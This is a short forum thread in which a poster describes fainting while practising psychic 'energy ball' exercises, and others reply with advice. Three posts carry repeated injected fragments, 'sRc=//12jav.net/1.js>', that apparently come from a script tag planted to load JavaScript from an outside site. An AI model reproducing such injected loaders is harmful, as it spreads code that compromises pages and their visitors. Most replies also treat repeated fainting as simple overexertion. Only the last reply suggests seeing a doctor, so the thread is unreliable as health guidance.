Whats happening?

For the past few days I've been doing exorcises to build my psychic energy. When I make energy balls, at least I think I'm making them, I start to faintly see them and then I pass out. What could this mean? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

You're over working yourself. Take it slow. Seeing the ball is exercising your ability to visualize :) Maybe a higher force doesn't want you to see. But more than likely, you're just over doing it :) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I think what's probably happening is that your focusing so much on building energy and visualizing that your forgetting to breath. Try to remember to breath regularly. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Well, you could keep trying or ask "why" it doesn't want you to see. I would just try it and remember to breath. If you continue to pass out I would see a doctor to make sure you don't have a health problem. Try to revisit the basics: meditate, grounding, centering, visual exercises, etc., repeat... then try again when you feel you have gained more insight.
